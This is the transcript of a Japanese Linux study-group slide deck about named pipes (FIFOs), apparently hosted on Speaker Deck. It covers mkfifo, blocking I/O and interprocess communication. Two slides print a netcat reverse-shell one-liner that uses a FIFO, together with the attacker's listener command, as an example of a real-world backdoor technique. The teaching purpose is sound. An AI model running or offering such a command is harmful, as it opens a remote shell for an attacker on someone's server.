Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Speaker Deck
PRO
Sign in
Sign up for free
名前付きパイプ FIFO
Osumi, Yusuke
February 13, 2021
Technology
0
160
名前付きパイプ FIFO
「新しいLinuxの教科書」を読む会 オンライン #10 での発表資料です。
https://linuxbook.connpass.com/event/202890/
Osumi, Yusuke
February 13, 2021
Tweet
Share
More Decks by Osumi, Yusuke
See All by Osumi, Yusuke
本の紹介の補足
ozuma
1
96
gitサービス3兄弟
ozuma
0
100
簡体字は楽
ozuma
0
110
ソフトウェアは固定資産
ozuma
0
140
ASCIIコードの小話
ozuma
0
130
今いるディレクトリを消すとどうなる
ozuma
1
79
文章、作文技法 リモートワーク
ozuma
1
470
CentOSの今後のリリース(簡易説明)
ozuma
0
140
AndroidでもLinux動いてるよ
ozuma
0
120
Other Decks in Technology
See All in Technology
What's new in Vision
satotakeshi
0
190
Design for Humans: How to make better modernization decisions
indualagarsamy
2
120
データエンジニアと作るデータ文化
yuki_saito
4
1.5k
LINEのB2Bプラットフォームにおけるトラブルシューティング2選
line_developers
PRO
3
290
20220622_FinJAWS_あのときにAWSがあったらこうできた
taketakekaho
0
110
Istio入門
nutslove
15
4.9k
データエンジニアリングの潮流を俯瞰する
tetsuroito
1
720
雑な攻撃からELBを守る一工夫 +おまけ / Know-how to protect servers from miscellaneous attacks
hiroga
0
480
【toranoana.deno#7】Denoからwasmを呼び出す基礎
toranoana
0
110
UIKitのアップデート #WWDC22
akatsuki174
4
270
GeoLocationAnchor and MKTileOverlay
toyship
0
110
RDRA + JavaによるレジャーSaaSプロダクトの要件定義と実装のシームレスな接続
jjebejj
PRO
3
520
Featured
See All Featured
Designing for humans not robots
tammielis
241
23k
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
marcduiker
4
500
Designing Dashboards & Data Visualisations in Web Apps
destraynor
224
49k
Git: the NoSQL Database
bkeepers
PRO
415
59k
A designer walks into a library…
pauljervisheath
196
16k
The Invisible Customer
myddelton
110
11k
A Tale of Four Properties
chriscoyier
149
21k
JazzCon 2018 Closing Keynote - Leadership for the Reluctant Leader
reverentgeek
172
8.4k
It's Worth the Effort
3n
172
25k
Fantastic passwords and where to find them - at NoRuKo
philnash
27
1.5k
Debugging Ruby Performance
tmm1
65
10k
Put a Button on it: Removing Barriers to Going Fast.
kastner
56
2.3k
Transcript
名前付きパイプ FIFO @ozuma5119 1 「新しいLinuxの教科書」を読む会 オンライン #10 2021/02/13
名前付きパイプ FIFO 2 書き込むと止まる(ブロッキングI/O) $ echo "Hello" > fifo $
tail -f fifo (別のターミナルで) 読み込んで解放
名前付きパイプ FIFO 3 先に読み込んでおく $ tail -f fifo $ echo
"Hello" > fifo 今度は書き込むとブロックされない
名前付きパイプ FIFO 4 書き込むと止まる(ブロッキングI/O) $ echo "Hello" > fifo 1.
入出力中は他の処理が行えない (特に遅いディスクを扱う ときにつらい) 2. ただし非同期処理で思わぬデータ破壊が起きにくい利点 ※深い話なので、ここではこれ以上突っ込まない
5 名前付きパイプ FIFO mkfifo - FIFO (名前付きパイプ) を作成する $ man
mkfifo $ mkfifo fifo $ ls -l fifo prw-rw-r--. 1 ozuma ozuma 0 2月 12 20:47 fifo $
6 $ cat sample.txt | sort $ cat sample.txt >
fifo $ sort < fifo 無名パイプ 名前付きパイプ
プロセス間通信に使われる 7 プロセス実行.... ガッ SIGTERM(15) プロセスA プロセスB 通信したいデータ シグナルによるプ ロセス間通信
名前付きパイプによる プロセス間通信 無名パイプ | と違って、 2つのプロセスはバラバラに 実行していて良い
高度な例(しかし実際の攻撃によく使われる) 被害サーバ:ここでは /tmp/f が名前付きパイプ 8 $ nc <IP> <port> <
/tmp/f | /bin/sh >/tmp/f 2>&1 攻撃者側サーバ:待ち受けておく $ nc -lvnp <port> ※nc: netcatコマンド。ネットワークでデータストリームを流すcat サーバにバックドア Reverse Shell を作る
9 攻撃者が攻撃対象のマシン 上でコマンド実行 (実際は、バレないように 見えないところで実行) 攻撃者のマシンに シェルがつながって 自由に操作できる
もう一度確認して解説 被害サーバ:ここでは /tmp/f が名前付きパイプ 10 $ nc <IP> <port> <
/tmp/f | /bin/sh >/tmp/f 2>&1 攻撃者側サーバ:待ち受けておく $ nc -lvnp <port> ※nc: netcatコマンド。ネットワークでデータストリームを流すcat サーバにバックドア Reverse Shell を作る